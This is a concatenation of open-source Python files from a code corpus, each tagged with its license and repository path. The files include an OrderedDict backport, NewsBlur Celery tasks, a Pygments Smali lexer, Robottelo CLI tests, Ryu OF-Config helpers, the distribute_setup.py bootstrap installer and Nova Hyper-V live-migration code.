Pairs are returned in LIFO order if last is true or FIFO order if false.
'''
if not self:
raise KeyError('dictionary is empty')
root = self.__root
if last:
link = root[0]
link_prev = link[0]
link_prev[1] = root
root[0] = link_prev
else:
link = root[1]
link_next = link[1]
root[1] = link_next
link_next[0] = root
key = link[2]
del self.__map[key]
value = dict.pop(self, key)
return key, value
# -- the following methods do not depend on the internal structure --
def keys(self):
'od.keys() -> list of keys in od'
return list(self)
def values(self):
'od.values() -> list of values in od'
return [self[key] for key in self]
def items(self):
'od.items() -> list of (key, value) pairs in od'
return [(key, self[key]) for key in self]
def iterkeys(self):
'od.iterkeys() -> an iterator over the keys in od'
return iter(self)
def itervalues(self):
'od.itervalues -> an iterator over the values in od'
for k in self:
yield self[k]
def iteritems(self):
'od.iteritems -> an iterator over the (key, value) items in od'
for k in self:
yield (k, self[k])
def update(*args, **kwds):
'''od.update(E, **F) -> None. Update od from dict/iterable E and F.
If E is a dict instance, does: for k in E: od[k] = E[k]
If E has a .keys() method, does: for k in E.keys(): od[k] = E[k]
Or if E is an iterable of items, does: for k, v in E: od[k] = v
In either case, this is followed by: for k, v in F.items(): od[k] = v
'''
if len(args) > 2:
raise TypeError('update() takes at most 2 positional '
'arguments (%d given)' % (len(args),))
elif not args:
raise TypeError('update() takes at least 1 argument (0 given)')
self = args[0]
# Make progressively weaker assumptions about "other"
other = ()
if len(args) == 2:
other = args[1]
if isinstance(other, dict):
for key in other:
self[key] = other[key]
elif hasattr(other, 'keys'):
for key in other.keys():
self[key] = other[key]
else:
for key, value in other:
self[key] = value
for key, value in kwds.items():
self[key] = value
__update = update # let subclasses override update without breaking __init__
__marker = object()
def pop(self, key, default=__marker):
'''od.pop(k[,d]) -> v, remove specified key and return the corresponding value.
If key is not found, d is returned if given, otherwise KeyError is raised.
'''
if key in self:
result = self[key]
del self[key]
return result
if default is self.__marker:
raise KeyError(key)
return default
def setdefault(self, key, default=None):
'od.setdefault(k[,d]) -> od.get(k,d), also set od[k]=d if k not in od'
if key in self:
return self[key]
self[key] = default
return default
def __repr__(self, _repr_running={}):
'od.__repr__() <==> repr(od)'
call_key = id(self), _get_ident()
if call_key in _repr_running:
return '...'
_repr_running[call_key] = 1
try:
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
finally:
del _repr_running[call_key]
def __reduce__(self):
'Return state information for pickling'
items = [[k, self[k]] for k in self]
inst_dict = vars(self).copy()
for k in vars(OrderedDict()):
inst_dict.pop(k, None)
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def copy(self):
'od.copy() -> a shallow copy of od'
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
'''OD.fromkeys(S[, v]) -> New ordered dictionary with keys from S
and values equal to v (which defaults to None).
'''
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
'''od.__eq__(y) <==> od==y. Comparison to another OD is order-sensitive
while comparison to a regular mapping is order-insensitive.
'''
if isinstance(other, OrderedDict):
return len(self)==len(other) and self.items() == other.items()
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
# -- the following methods are only used in Python 2.7 --
def viewkeys(self):
"od.viewkeys() -> a set-like object providing a view on od's keys"
return KeysView(self)
def viewvalues(self):
"od.viewvalues() -> an object providing a view on od's values"
return ValuesView(self)
def viewitems(self):
"od.viewitems() -> a set-like object providing a view on od's items"
return ItemsView(self)
| bsd-2-clause |
AlphaCluster/NewsBlur | apps/profile/tasks.py | 2 | 3437 | import datetime
from celery.task import Task
from apps.profile.models import Profile, RNewUserQueue
from utils import log as logging
from apps.reader.models import UserSubscription, UserSubscriptionFolders
from apps.social.models import MSocialServices, MActivity, MInteraction
class EmailNewUser(Task):
def run(self, user_id):
user_profile = Profile.objects.get(user__pk=user_id)
user_profile.send_new_user_email()
class EmailNewPremium(Task):
def run(self, user_id):
user_profile = Profile.objects.get(user__pk=user_id)
user_profile.send_new_premium_email()
class PremiumExpire(Task):
name = 'premium-expire'
def run(self, **kwargs):
# Get expired but grace period users
two_days_ago = datetime.datetime.now() - datetime.timedelta(days=2)
thirty_days_ago = datetime.datetime.now() - datetime.timedelta(days=30)
expired_profiles = Profile.objects.filter(is_premium=True,
premium_expire__lte=two_days_ago,
premium_expire__gt=thirty_days_ago)
logging.debug(" ---> %s users have expired premiums, emailing grace..." % expired_profiles.count())
for profile in expired_profiles:
if profile.grace_period_email_sent():
continue
profile.setup_premium_history()
if profile.premium_expire < two_days_ago:
profile.send_premium_expire_grace_period_email()
# Get fully expired users
expired_profiles = Profile.objects.filter(is_premium=True,
premium_expire__lte=thirty_days_ago)
logging.debug(" ---> %s users have expired premiums, deactivating and emailing..." % expired_profiles.count())
for profile in expired_profiles:
profile.setup_premium_history()
if profile.premium_expire < thirty_days_ago:
profile.send_premium_expire_email()
profile.deactivate_premium()
class ActivateNextNewUser(Task):
name = 'activate-next-new-user'
def run(self):
RNewUserQueue.activate_next()
class CleanupUser(Task):
name = 'cleanup-user'
def run(self, user_id):
UserSubscription.trim_user_read_stories(user_id)
UserSubscription.verify_feeds_scheduled(user_id)
Profile.count_all_feed_subscribers_for_user(user_id)
MInteraction.trim(user_id)
MActivity.trim(user_id)
UserSubscriptionFolders.add_missing_feeds_for_user(user_id)
UserSubscriptionFolders.compact_for_user(user_id)
# UserSubscription.refresh_stale_feeds(user_id)
try:
ss = MSocialServices.objects.get(user_id=user_id)
except MSocialServices.DoesNotExist:
logging.debug(" ---> ~FRCleaning up user, can't find social_services for user_id: ~SB%s" % user_id)
return
ss.sync_twitter_photo()
class CleanSpam(Task):
name = 'clean-spam'
def run(self, **kwargs):
logging.debug(" ---> Finding spammers...")
Profile.clear_dead_spammers(confirm=True)
class ReimportStripeHistory(Task):
name = 'reimport-stripe-history'
def run(self, **kwargs):
logging.debug(" ---> Reimporting Stripe history...")
Profile.reimport_stripe_history(limit=10, days=1)
| mit |
andresguisado/andresguisado.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/lexers/dalvik.py | 364 | 3442 | # -*- coding: utf-8 -*-
"""
pygments.lexers.dalvik
~~~~~~~~~~~~~~~~~~~~~~
Pygments lexers for Dalvik VM-related languages.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexer import RegexLexer, include, bygroups
from pygments.token import Keyword, Text, Comment, Name, String, Number, \
Punctuation
__all__ = ['SmaliLexer']
class SmaliLexer(RegexLexer):
"""
For `Smali <http://code.google.com/p/smali/>`_ (Android/Dalvik) assembly
code.
*New in Pygments 1.6.*
"""
name = 'Smali'
aliases = ['smali']
filenames = ['*.smali']
mimetypes = ['text/smali']
tokens = {
'root': [
include('comment'),
include('label'),
include('field'),
include('method'),
include('class'),
include('directive'),
include('access-modifier'),
include('instruction'),
include('literal'),
include('punctuation'),
include('type'),
include('whitespace')
],
'directive': [
(r'^[ \t]*\.(class|super|implements|field|subannotation|annotation|'
r'enum|method|registers|locals|array-data|packed-switch|'
r'sparse-switch|catchall|catch|line|parameter|local|prologue|'
r'epilogue|source)', Keyword),
(r'^[ \t]*\.end (field|subannotation|annotation|method|array-data|'
'packed-switch|sparse-switch|parameter|local)', Keyword),
(r'^[ \t]*\.restart local', Keyword),
],
'access-modifier': [
(r'(public|private|protected|static|final|synchronized|bridge|'
r'varargs|native|abstract|strictfp|synthetic|constructor|'
r'declared-synchronized|interface|enum|annotation|volatile|'
r'transient)', Keyword),
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
],
'instruction': [
(r'\b[vp]\d+\b', Name.Builtin), # registers
(r'\b[a-z][A-Za-z0-9/-]+\s+', Text), # instructions
],
'literal': [
(r'".*"', String),
(r'0x[0-9A-Fa-f]+t?', Number.Hex),
(r'[0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float),
(r'[0-9]+L?', Number.Integer),
],
'field': [
(r'(\$?\b)([A-Za-z0-9_$]*)(:)',
bygroups(Punctuation, Name.Variable, Punctuation)),
],
'method': [
(r'<(?:cl)?init>', Name.Function), # constructor
(r'(\$?\b)([A-Za-z0-9_$]*)(\()',
bygroups(Punctuation, Name.Function, Punctuation)),
],
'label': [
(r':[A-Za-z0-9_]+', Name.Label),
],
'class': [
# class names in the form Lcom/namespace/ClassName;
# I only want to color the ClassName part, so the namespace part is
# treated as 'Text'
(r'(L)((?:[A-Za-z0-9_$]+/)*)([A-Za-z0-9_$]+)(;)',
bygroups(Keyword.Type, Text, Name.Class, Text)),
],
'punctuation': [
(r'->', Punctuation),
(r'[{},\(\):=\.-]', Punctuation),
],
'type': [
(r'[ZBSCIJFDV\[]+', Keyword.Type),
],
'comment': [
(r'#.*?\n', Comment),
],
}
| mit |
omaciel/robottelo | tests/foreman/cli/test_medium.py | 3 | 4480 | # -*- encoding: utf-8 -*-
"""Test for Medium CLI
:Requirement: Medium
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Hosts
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
from fauxfactory import gen_alphanumeric
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.factory import make_location, make_medium, make_org, make_os
from robottelo.cli.medium import Medium
from robottelo.datafactory import valid_data_list
from robottelo.decorators import tier1, tier2, upgrade
from robottelo.test import CLITestCase
URL = "http://mirror.fakeos.org/%s/$major.$minor/os/$arch"
OSES = [
'Archlinux',
'Debian',
'Gentoo',
'Redhat',
'Solaris',
'Suse',
'Windows',
]
class MediumTestCase(CLITestCase):
"""Test class for Medium CLI"""
@tier1
def test_positive_create_with_name(self):
"""Check if Medium can be created
:id: 4a1caaf8-4401-48cc-85ad-e7189944688d
:expectedresults: Medium is created
:CaseImportance: Critical
"""
for name in valid_data_list():
with self.subTest(name):
medium = make_medium({'name': name})
self.assertEqual(medium['name'], name)
@tier1
def test_positive_create_with_location(self):
"""Check if medium with location can be created
:id: cbc6c586-fae7-4bb9-aeb1-e30158f16a98
:expectedresults: Medium is created and has new location assigned
:CaseImportance: Medium
"""
location = make_location()
medium = make_medium({'location-ids': location['id']})
self.assertIn(location['name'], medium['locations'])
@tier1
def test_positive_create_with_organization_by_id(self):
"""Check if medium with organization can be created
:id: 631bb6ed-e42b-482a-83f0-f6ce0f20729a
:expectedresults: Medium is created and has new organization assigned
:CaseImportance: Medium
"""
org = make_org()
medium = make_medium({'organization-ids': org['id']})
self.assertIn(org['name'], medium['organizations'])
@tier1
def test_positive_delete_by_id(self):
"""Check if Medium can be deleted
:id: dc62c9ad-d2dc-42df-80eb-02cf8d26cdee
:expectedresults: Medium is deleted
:CaseImportance: Critical
"""
for name in valid_data_list():
with self.subTest(name):
medium = make_medium({'name': name})
Medium.delete({'id': medium['id']})
with self.assertRaises(CLIReturnCodeError):
Medium.info({'id': medium['id']})
# pylint: disable=no-self-use
@tier2
def test_positive_add_os(self):
"""Check if Medium can be associated with operating system
:id: 47d1e6f0-d8a6-4190-b2ac-41b09a559429
:expectedresults: Operating system added
:CaseLevel: Integration
"""
medium = make_medium()
os = make_os()
Medium.add_operating_system({
'id': medium['id'],
'operatingsystem-id': os['id'],
})
@tier2
@upgrade
def test_positive_remove_os(self):
"""Check if operating system can be removed from media
:id: 23b5b55b-3624-440c-8001-75c7c5a5a004
:expectedresults: Operating system removed
:CaseLevel: Integration
"""
medium = make_medium()
os = make_os()
Medium.add_operating_system({
'id': medium['id'],
'operatingsystem-id': os['id'],
})
medium = Medium.info({'id': medium['id']})
self.assertIn(os['title'], medium['operating-systems'])
Medium.remove_operating_system({
'id': medium['id'],
'operatingsystem-id': os['id'],
})
medium = Medium.info({'id': medium['id']})
self.assertNotIn(os['name'], medium['operating-systems'])
@tier1
def test_positive_update_name(self):
"""Check if medium can be updated
:id: 2111090a-21d3-47f7-bb81-5f19ab71a91d
:expectedresults: Medium updated
:CaseImportance: Medium
"""
new_name = gen_alphanumeric(6)
medium = make_medium()
Medium.update({
'name': medium['name'],
'new-name': new_name,
})
medium = Medium.info({'id': medium['id']})
self.assertEqual(medium['name'], new_name)
| gpl-3.0 |
castroflavio/ryu | ryu/lib/of_config/base.py | 22 | 4331 | # Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
# Copyright (C) 2013 YAMAMOTO Takashi <yamamoto at valinux co jp>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# convenient classes to manipulate OF-Config XML
# in a little more pythonic way.
# currently assuming OF-Config 1.1.1.
from ryu.lib import stringify
from lxml import objectify
import lxml.etree as ET
_ns_of111 = 'urn:onf:of111:config:yang'
_ns_netconf = 'urn:ietf:params:xml:ns:netconf:base:1.0'
_nsmap = {
'of111': _ns_of111,
'nc': _ns_netconf,
}
def _pythonify(name):
return name.replace('-', '_')
class _e(object):
def __init__(self, name, is_list):
self.name = name
self.cls = None
self.is_list = is_list
# complexType
class _ct(_e):
def __init__(self, name, cls, is_list):
super(_ct, self).__init__(name, is_list)
self.cls = cls
class _Base(stringify.StringifyMixin):
_M = objectify.ElementMaker(annotate=False,
namespace=_ns_of111,
nsmap=_nsmap)
def __init__(self, **kwargs):
for e in self._ELEMENTS:
k = _pythonify(e.name)
try:
v = kwargs.pop(k)
assert e.name not in kwargs
except KeyError:
k = e.name
try:
v = kwargs.pop(k)
except KeyError:
if e.is_list:
v = []
else:
v = None
setattr(self, k, v)
if kwargs:
raise TypeError('unknown kwargs %s' % kwargs)
def to_et(self, tag):
def convert(v):
if isinstance(v, _Base):
return v.to_et(e.name)
elif isinstance(v, objectify.ObjectifiedElement):
assert ET.QName(v.tag).localname == itag
return v
return self._M(itag, v)
args = []
for e in self._ELEMENTS:
itag = e.name
k = _pythonify(itag)
v = getattr(self, k)
if v is None:
continue
if isinstance(v, list):
assert e.is_list
ele = map(convert, v)
else:
assert not e.is_list
ele = [convert(v)]
args.extend(ele)
return self._M(tag, *args)
def to_xml(self, tag):
e = self.to_et(tag)
return ET.tostring(e, pretty_print=True)
@classmethod
def from_xml(cls, xmlstring):
et = objectify.fromstring(xmlstring)
return cls.from_et(et)
@classmethod
def from_et(cls, et):
def convert(v):
if e.cls is not None:
return e.cls.from_et(v)
return v
kwargs = {}
for e in cls._ELEMENTS:
try:
v = et[e.name]
except AttributeError:
continue
assert isinstance(v, objectify.ObjectifiedElement)
if len(v) == 1:
v = convert(v)
if e.is_list:
v = [v]
else:
assert e.is_list
v = map(convert, v)
k = _pythonify(e.name)
assert k not in kwargs
kwargs[k] = v
return cls(**kwargs)
def __getattribute__(self, k):
return stringify.StringifyMixin.__getattribute__(self, _pythonify(k))
def __setattr__(self, k, v):
stringify.StringifyMixin.__setattr__(self, _pythonify(k), v)
class _Unimpl(_Base):
_ELEMENTS = [
_e('raw_et', is_list=False),
]
def to_et(self, tag):
assert self.raw_et.tag == tag
return self.raw_et
@classmethod
def from_et(cls, et):
return cls(raw_et=et)
| apache-2.0 |
abhishek-ch/hue | desktop/core/ext-py/Mako-0.8.1/distribute_setup.py | 64 | 15757 | #!python
"""Bootstrap distribute installation
If you want to use setuptools in your package's setup.py, just include this
file in the same directory with it, and add this to the top of your setup.py::
from distribute_setup import use_setuptools
use_setuptools()
If you want to require a specific version of setuptools, set a download
mirror, or use an alternate download directory, you can do so by supplying
the appropriate options to ``use_setuptools()``.
This file can also be run as a script to install or upgrade setuptools.
"""
import os
import sys
import time
import fnmatch
import tempfile
import tarfile
from distutils import log
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
try:
import subprocess
def _python_cmd(*args):
args = (sys.executable,) + args
return subprocess.call(args) == 0
except ImportError:
# will be used for python 2.3
def _python_cmd(*args):
args = (sys.executable,) + args
# quoting arguments if windows
if sys.platform == 'win32':
def quote(arg):
if ' ' in arg:
return '"%s"' % arg
return arg
args = [quote(arg) for arg in args]
return os.spawnl(os.P_WAIT, sys.executable, *args) == 0
DEFAULT_VERSION = "0.6.13"
DEFAULT_URL = "http://pypi.python.org/packages/source/d/distribute/"
SETUPTOOLS_FAKED_VERSION = "0.6c11"
SETUPTOOLS_PKG_INFO = """\
Metadata-Version: 1.0
Name: setuptools
Version: %s
Summary: xxxx
Home-page: xxx
Author: xxx
Author-email: xxx
License: xxx
Description: xxx
""" % SETUPTOOLS_FAKED_VERSION
def _install(tarball):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# installing
log.warn('Installing Distribute')
if not _python_cmd('setup.py', 'install'):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
finally:
os.chdir(old_wd)
def _build_egg(egg, tarball, to_dir):
# extracting the tarball
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
tar = tarfile.open(tarball)
_extractall(tar)
tar.close()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
# building an egg
log.warn('Building a Distribute egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
finally:
os.chdir(old_wd)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
def _do_download(version, download_base, to_dir, download_delay):
egg = os.path.join(to_dir, 'distribute-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
tarball = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, tarball, to_dir)
sys.path.insert(0, egg)
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, download_delay=15, no_fake=True):
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
was_imported = 'pkg_resources' in sys.modules or \
'setuptools' in sys.modules
try:
try:
import pkg_resources
if not hasattr(pkg_resources, '_distribute'):
if not no_fake:
_fake_setuptools()
raise ImportError
except ImportError:
return _do_download(version, download_base, to_dir, download_delay)
try:
pkg_resources.require("distribute>="+version)
return
except pkg_resources.VersionConflict:
e = sys.exc_info()[1]
if was_imported:
sys.stderr.write(
"The required version of distribute (>=%s) is not available,\n"
"and can't be installed while this script is running. Please\n"
"install a more recent version first, using\n"
"'easy_install -U distribute'."
"\n\n(Currently using %r)\n" % (version, e.args[0]))
sys.exit(2)
else:
del pkg_resources, sys.modules['pkg_resources'] # reload ok
return _do_download(version, download_base, to_dir,
download_delay)
except pkg_resources.DistributionNotFound:
return _do_download(version, download_base, to_dir,
download_delay)
finally:
if not no_fake:
_create_fake_setuptools_pkg_info(to_dir)
def download_setuptools(version=DEFAULT_VERSION, download_base=DEFAULT_URL,
to_dir=os.curdir, delay=15):
"""Download distribute from a specified location and return its filename
`version` should be a valid distribute version number that is available
as an egg for download under the `download_base` URL (which should end
with a '/'). `to_dir` is the directory where the egg will be downloaded.
`delay` is the number of seconds to pause before an actual download
attempt.
"""
# making sure we use the absolute path
to_dir = os.path.abspath(to_dir)
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
tgz_name = "distribute-%s.tar.gz" % version
url = download_base + tgz_name
saveto = os.path.join(to_dir, tgz_name)
src = dst = None
if not os.path.exists(saveto): # Avoid repeated downloads
try:
log.warn("Downloading %s", url)
src = urlopen(url)
# Read/write all in one block, so we don't create a corrupt file
# if the download is interrupted.
data = src.read()
dst = open(saveto, "wb")
dst.write(data)
finally:
if src:
src.close()
if dst:
dst.close()
return os.path.realpath(saveto)
def _no_sandbox(function):
def __no_sandbox(*args, **kw):
try:
from setuptools.sandbox import DirectorySandbox
if not hasattr(DirectorySandbox, '_old'):
def violation(*args):
pass
DirectorySandbox._old = DirectorySandbox._violation
DirectorySandbox._violation = violation
patched = True
else:
patched = False
except ImportError:
patched = False
try:
return function(*args, **kw)
finally:
if patched:
DirectorySandbox._violation = DirectorySandbox._old
del DirectorySandbox._old
return __no_sandbox
def _patch_file(path, content):
"""Will backup the file then patch it"""
existing_content = open(path).read()
if existing_content == content:
# already patched
log.warn('Already patched.')
return False
log.warn('Patching...')
_rename_path(path)
f = open(path, 'w')
try:
f.write(content)
finally:
f.close()
return True
_patch_file = _no_sandbox(_patch_file)
def _same_content(path, content):
return open(path).read() == content
def _rename_path(path):
new_name = path + '.OLD.%s' % time.time()
log.warn('Renaming %s into %s', path, new_name)
os.rename(path, new_name)
return new_name
def _remove_flat_installation(placeholder):
if not os.path.isdir(placeholder):
log.warn('Unkown installation at %s', placeholder)
return False
found = False
for file in os.listdir(placeholder):
if fnmatch.fnmatch(file, 'setuptools*.egg-info'):
found = True
break
if not found:
log.warn('Could not locate setuptools*.egg-info')
return
log.warn('Removing elements out of the way...')
pkg_info = os.path.join(placeholder, file)
if os.path.isdir(pkg_info):
patched = _patch_egg_dir(pkg_info)
else:
patched = _patch_file(pkg_info, SETUPTOOLS_PKG_INFO)
if not patched:
log.warn('%s already patched.', pkg_info)
return False
# now let's move the files out of the way
for element in ('setuptools', 'pkg_resources.py', 'site.py'):
element = os.path.join(placeholder, element)
if os.path.exists(element):
_rename_path(element)
else:
log.warn('Could not find the %s element of the '
'Setuptools distribution', element)
return True
_remove_flat_installation = _no_sandbox(_remove_flat_installation)
def _after_install(dist):
log.warn('After install bootstrap.')
placeholder = dist.get_command_obj('install').install_purelib
_create_fake_setuptools_pkg_info(placeholder)
def _create_fake_setuptools_pkg_info(placeholder):
if not placeholder or not os.path.exists(placeholder):
log.warn('Could not find the install location')
return
pyver = '%s.%s' % (sys.version_info[0], sys.version_info[1])
setuptools_file = 'setuptools-%s-py%s.egg-info' % \
(SETUPTOOLS_FAKED_VERSION, pyver)
pkg_info = os.path.join(placeholder, setuptools_file)
if os.path.exists(pkg_info):
log.warn('%s already exists', pkg_info)
return
log.warn('Creating %s', pkg_info)
f = open(pkg_info, 'w')
try:
f.write(SETUPTOOLS_PKG_INFO)
finally:
f.close()
pth_file = os.path.join(placeholder, 'setuptools.pth')
log.warn('Creating %s', pth_file)
f = open(pth_file, 'w')
try:
f.write(os.path.join(os.curdir, setuptools_file))
finally:
f.close()
_create_fake_setuptools_pkg_info = _no_sandbox(_create_fake_setuptools_pkg_info)
def _patch_egg_dir(path):
# let's check if it's already patched
pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
if os.path.exists(pkg_info):
if _same_content(pkg_info, SETUPTOOLS_PKG_INFO):
log.warn('%s already patched.', pkg_info)
return False
_rename_path(path)
os.mkdir(path)
os.mkdir(os.path.join(path, 'EGG-INFO'))
pkg_info = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
f = open(pkg_info, 'w')
try:
f.write(SETUPTOOLS_PKG_INFO)
finally:
f.close()
return True
_patch_egg_dir = _no_sandbox(_patch_egg_dir)
def _before_install():
log.warn('Before install bootstrap.')
_fake_setuptools()
def _under_prefix(location):
if 'install' not in sys.argv:
return True
args = sys.argv[sys.argv.index('install')+1:]
for index, arg in enumerate(args):
for option in ('--root', '--prefix'):
if arg.startswith('%s=' % option):
top_dir = arg.split('root=')[-1]
return location.startswith(top_dir)
elif arg == option:
if len(args) > index:
top_dir = args[index+1]
return location.startswith(top_dir)
if arg == '--user' and USER_SITE is not None:
return location.startswith(USER_SITE)
return True
def _fake_setuptools():
log.warn('Scanning installed packages')
try:
import pkg_resources
except ImportError:
# we're cool
log.warn('Setuptools or Distribute does not seem to be installed.')
return
ws = pkg_resources.working_set
try:
setuptools_dist = ws.find(pkg_resources.Requirement.parse('setuptools',
replacement=False))
except TypeError:
# old distribute API
setuptools_dist = ws.find(pkg_resources.Requirement.parse('setuptools'))
if setuptools_dist is None:
log.warn('No setuptools distribution found')
return
# detecting if it was already faked
setuptools_location = setuptools_dist.location
log.warn('Setuptools installation detected at %s', setuptools_location)
# if --root or --preix was provided, and if
# setuptools is not located in them, we don't patch it
if not _under_prefix(setuptools_location):
log.warn('Not patching, --root or --prefix is installing Distribute'
' in another location')
return
# let's see if its an egg
if not setuptools_location.endswith('.egg'):
log.warn('Non-egg installation')
res = _remove_flat_installation(setuptools_location)
if not res:
return
else:
log.warn('Egg installation')
pkg_info = os.path.join(setuptools_location, 'EGG-INFO', 'PKG-INFO')
if (os.path.exists(pkg_info) and
_same_content(pkg_info, SETUPTOOLS_PKG_INFO)):
log.warn('Already patched.')
return
log.warn('Patching...')
# let's create a fake egg replacing setuptools one
res = _patch_egg_dir(setuptools_location)
if not res:
return
log.warn('Patched done.')
_relaunch()
def _relaunch():
log.warn('Relaunching...')
# we have to relaunch the process
# pip marker to avoid a relaunch bug
if sys.argv[:3] == ['-c', 'install', '--single-version-externally-managed']:
sys.argv[0] = 'setup.py'
args = [sys.executable] + sys.argv
sys.exit(subprocess.call(args))
def _extractall(self, path=".", members=None):
"""Extract all members from the archive to the current working
directory and set owner, modification time and permissions on
directories afterwards. `path' specifies a different directory
to extract to. `members' is optional and must be a subset of the
list returned by getmembers().
"""
import copy
import operator
from tarfile import ExtractError
directories = []
if members is None:
members = self
for tarinfo in members:
if tarinfo.isdir():
# Extract directories with a safe mode.
directories.append(tarinfo)
tarinfo = copy.copy(tarinfo)
tarinfo.mode = 448 # decimal for oct 0700
self.extract(tarinfo, path)
# Reverse sort directories.
if sys.version_info < (2, 4):
def sorter(dir1, dir2):
return cmp(dir1.name, dir2.name)
directories.sort(sorter)
directories.reverse()
else:
directories.sort(key=operator.attrgetter('name'), reverse=True)
# Set correct owner, mtime and filemode on directories.
for tarinfo in directories:
dirpath = os.path.join(path, tarinfo.name)
try:
self.chown(tarinfo, dirpath)
self.utime(tarinfo, dirpath)
self.chmod(tarinfo, dirpath)
except ExtractError:
e = sys.exc_info()[1]
if self.errorlevel > 1:
raise
else:
self._dbg(1, "tarfile: %s" % e)
def main(argv, version=DEFAULT_VERSION):
"""Install or upgrade setuptools and EasyInstall"""
tarball = download_setuptools()
_install(tarball)
if __name__ == '__main__':
main(sys.argv[1:])
| apache-2.0 |
plumgrid/plumgrid-nova | nova/virt/hyperv/livemigrationops.py | 12 | 4920 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for live migration VM operations.
"""
import functools
from oslo.config import cfg
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('use_cow_images', 'nova.virt.driver')
def check_os_version_requirement(function):
@functools.wraps(function)
def wrapper(self, *args, **kwds):
if not self._livemigrutils:
raise NotImplementedError(_('Live migration is supported '
'starting with Hyper-V Server '
'2012'))
return function(self, *args, **kwds)
return wrapper
class LiveMigrationOps(object):
def __init__(self):
# Live migration is supported starting from Hyper-V Server 2012
if utilsfactory.get_hostutils().check_min_windows_version(6, 2):
self._livemigrutils = utilsfactory.get_livemigrationutils()
else:
self._livemigrutils = None
self._pathutils = utilsfactory.get_pathutils()
self._volumeops = volumeops.VolumeOps()
self._imagecache = imagecache.ImageCache()
@check_os_version_requirement
def live_migration(self, context, instance_ref, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
LOG.debug(_("live_migration called"), instance=instance_ref)
instance_name = instance_ref["name"]
try:
iscsi_targets = self._livemigrutils.live_migrate_vm(instance_name,
dest)
for (target_iqn, target_lun) in iscsi_targets:
self._volumeops.logout_storage_target(target_iqn)
except Exception:
with excutils.save_and_reraise_exception():
LOG.debug(_("Calling live migration recover_method "
"for instance: %s"), instance_name)
recover_method(context, instance_ref, dest, block_migration)
LOG.debug(_("Calling live migration post_method for instance: %s"),
instance_name)
post_method(context, instance_ref, dest, block_migration)
@check_os_version_requirement
def pre_live_migration(self, context, instance, block_device_info,
network_info):
LOG.debug(_("pre_live_migration called"), instance=instance)
self._livemigrutils.check_live_migration_config()
if CONF.use_cow_images:
boot_from_volume = self._volumeops.ebs_root_in_block_devices(
block_device_info)
if not boot_from_volume:
self._imagecache.get_cached_image(context, instance)
self._volumeops.login_storage_targets(block_device_info)
@check_os_version_requirement
def post_live_migration_at_destination(self, ctxt, instance_ref,
network_info, block_migration):
LOG.debug(_("post_live_migration_at_destination called"),
instance=instance_ref)
@check_os_version_requirement
def check_can_live_migrate_destination(self, ctxt, instance_ref,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
LOG.debug(_("check_can_live_migrate_destination called"), instance_ref)
return {}
@check_os_version_requirement
def check_can_live_migrate_destination_cleanup(self, ctxt,
dest_check_data):
LOG.debug(_("check_can_live_migrate_destination_cleanup called"))
@check_os_version_requirement
def check_can_live_migrate_source(self, ctxt, instance_ref,
dest_check_data):
LOG.debug(_("check_can_live_migrate_source called"), instance_ref)
return dest_check_data
| apache-2.0 |
